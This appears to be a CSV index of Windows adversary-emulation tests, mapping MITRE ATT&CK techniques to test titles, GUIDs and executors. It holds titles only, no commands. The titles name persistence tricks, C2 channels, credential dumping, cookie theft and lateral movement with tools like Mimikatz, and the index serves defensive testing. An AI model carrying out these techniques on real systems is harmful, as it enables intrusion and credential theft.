persistence,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
persistence,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
persistence,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
persistence,T1136.001,Create Account: Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt
persistence,T1136.001,Create Account: Local Account,4,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell
persistence,T1136.001,Create Account: Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
persistence,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
persistence,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
persistence,T1546.001,Event Triggered Execution: Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,10,Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value,acfef903-7662-447e-a391-9c91c2f00f7b,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,11,Change Startup Folder - HKCU Modify User Shell Folders Startup Value,8834b65a-f808-4ece-ad7e-2acdf647aafa,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,12,HKCU - Policy Settings Explorer Run Key,a70faea1-e206-4f6f-8d9a-67379be8f6f1,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,secedit used to create a Run key in the HKLM Hive,14fdc3f1-6fc3-4556-8d36-aa89d9d42d02,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,Modify BootExecute Value,befc2b40-d487-4a5a-8813-c11085fb5672,powershell
persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
persistence,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
persistence,T1098,Account Manipulation,10,Domain Password Policy Check: Short Password,fc5f9414-bd67-4f5f-a08e-e5381e29cbd1,powershell
persistence,T1098,Account Manipulation,11,Domain Password Policy Check: No Number in Password,68190529-069b-4ffc-a942-919704158065,powershell
persistence,T1098,Account Manipulation,12,Domain Password Policy Check: No Special Character in Password,7d984ef2-2db2-4cec-b090-e637e1698f61,powershell
persistence,T1098,Account Manipulation,13,Domain Password Policy Check: No Uppercase Character in Password,b299c120-44a7-4d68-b8e2-8ba5a28511ec,powershell
persistence,T1098,Account Manipulation,14,Domain Password Policy Check: No Lowercase Character in Password,945da11e-977e-4dab-85d2-f394d03c5887,powershell
persistence,T1098,Account Manipulation,15,Domain Password Policy Check: Only Two Character Classes,784d1349-5a26-4d20-af5e-d6af53bae460,powershell
persistence,T1098,Account Manipulation,16,Domain Password Policy Check: Common Password Use,81959d03-c51f-49a1-bb24-23f1ec885578,powershell
persistence,T1505.004,IIS Components,1,Install IIS Module using AppCmd.exe,53adbdfa-8200-490c-871c-d3b1ab3324b2,command_prompt
persistence,T1505.004,IIS Components,2,Install IIS Module using PowerShell Cmdlet New-WebGlobalModule,cc3381fb-4bd0-405c-a8e4-6cacfac3b06c,powershell
persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
persistence,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process,adae83d3-0df6-45e7-b2c3-575f91584577,powershell
persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
persistence,T1137.004,Office Application Startup: Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
persistence,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
persistence,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
persistence,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
persistence,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1137.002,Office Application Startup: Office Test,1,Office Application Startup Test Persistence (HKCU),c3e35b58-fe1c-480b-b540-7600fb612563,powershell
persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
persistence,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
persistence,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
persistence,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
persistence,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
command-and-control,T1132.001,Data Encoding: Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,1,DNS Large Query Volume,1700f5d6-5a44-487b-84de-bc66f507b0a6,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,2,DNS Regular Beaconing,3efc144e-1af8-46bb-8ca2-1376bb6db8b6,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,3,DNS Long Domain Query,fef31710-223a-40ee-8462-a396d6b66978,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,4,DNS C2,e7bf9802-2e78-4db9-93b5-181b7bcd37d7,powershell
command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ecca999b-e0c8-40e8-8416-ad320b146a75,powershell
command-and-control,T1219,Remote Access Software,9,UltraViewer - RAT Execution,19acf63b-55c4-4b6a-8552-00a8865105c8,powershell
command-and-control,T1219,Remote Access Software,10,UltraVNC Execution,42e51815-a6cc-4c75-b970-3f0ff54b610e,powershell
command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b8128b-c5d4-4de9-bf70-e60419274562,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
command-and-control,T1090.003,Proxy: Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
command-and-control,T1090.003,Proxy: Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used port with PowerShell,21fe622f-8e53-4b31-ba83-6d333c2583f4,powershell
command-and-control,T1573,Encrypted Channel,1,OpenSSL C2,21caf58e-87ad-440c-a6b8-3ac259964003,powershell
command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
command-and-control,T1095,Non-Application Layer Protocol,3,Powercat C2,3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e,powershell
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
command-and-control,T1105,Ingress Tool Transfer,7,certutil download (urlcache),dd3b61dd-7bbc-48cd-ab51-49ad1a776df0,command_prompt
command-and-control,T1105,Ingress Tool Transfer,8,certutil download (verifyctl),ffd492e3-0455-4518-9fb1-46527c9f241b,powershell
command-and-control,T1105,Ingress Tool Transfer,9,Windows - BITSAdmin BITS Download,a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b,command_prompt
command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download,42dc4460-9aa6-45d3-b1a6-3955d34e1fe8,powershell
command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
command-and-control,T1105,Ingress Tool Transfer,16,File download with finger.exe on Windows,5f507e45-8411-4f99-84e7-e38530c45d01,command_prompt
command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD.exe,1a02df58-09af-4064-a765-0babe1a0d1e2,powershell
command-and-control,T1105,Ingress Tool Transfer,18,Curl Download File,2b080b99-0deb-4d51-af0f-833d37c4ca6a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,19,Curl Upload File,635c9a38-6cbf-47dc-8615-3810bc1167cf,command_prompt
command-and-control,T1105,Ingress Tool Transfer,20,Download a file with Microsoft Connection Manager Auto-Download,d239772b-88e2-4a2e-8473-897503401bcc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,21,MAZE Propagation Script,70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf,powershell
command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Line Tool UNC share folder into a zip file,49845fc1-7961-4590-a0f0-3dbcf065ae7e,command_prompt
command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt
command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
collection,T1560.001,Archive Collected Data: Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
collection,T1113,Screen Capture,6,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
collection,T1074.001,Data Staged: Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
collection,T1074.001,Data Staged: Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
collection,T1114.001,Email Collection: Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell
collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
collection,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
collection,T1125,Video Capture,1,Registry artefact when application use webcam,6581e4a7-42e3-43c5-a0d2-5a0d62f9702a,command_prompt
collection,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
collection,T1039,Data from Network Shared Drive,1,Copy a sensitive File over Administrative share with copy,6ed67921-1774-44ba-bac6-adb51ed60660,command_prompt
collection,T1039,Data from Network Shared Drive,2,Copy a sensitive File over Administrative share with Powershell,7762e120-5879-44ff-97f8-008b401b9a98,powershell
collection,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
lateral-movement,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
lateral-movement,T1021.006,Remote Services: Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
lateral-movement,T1021.006,Remote Services: Windows Remote Management,2,Remote Code Execution with PS Credentials Using Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Remote Services: Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
lateral-movement,T1021.003,Remote Services: Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
lateral-movement,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
lateral-movement,T1563.002,Remote Service Session Hijacking: RDP Hijacking,1,RDP hijacking,a37ac520-b911-458e-8aed-c5f1576d9f46,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,1,RDP to DomainController,355d4632-8cb9-449d-91ce-b566d0253d3e,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,2,Changing RDP Port to Non Standard Port via Powershell,2f840dd4-8a2e-4f44-beb3-6b2399ea3771,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,3,Changing RDP Port to Non Standard Port via Command_Prompt,74ace21e-a31c-4f7d-b540-53e4eb6d1f73,command_prompt
credential-access,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
credential-access,T1003,OS Credential Dumping,4,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list),6c7a4fd3-5b0b-4b30-a93e-39411b25d889,powershell
credential-access,T1003,OS Credential Dumping,5,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config),42510244-5019-48fa-a0e5-66c3b76e6049,powershell
credential-access,T1003,OS Credential Dumping,6,Dump Credential Manager using keymgr.dll and rundll32.exe,84113186-ed3c-4d0d-8a3c-8980c86c1f4a,powershell
credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,4,PowerDump Hashes and Usernames from Registry,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,command_prompt
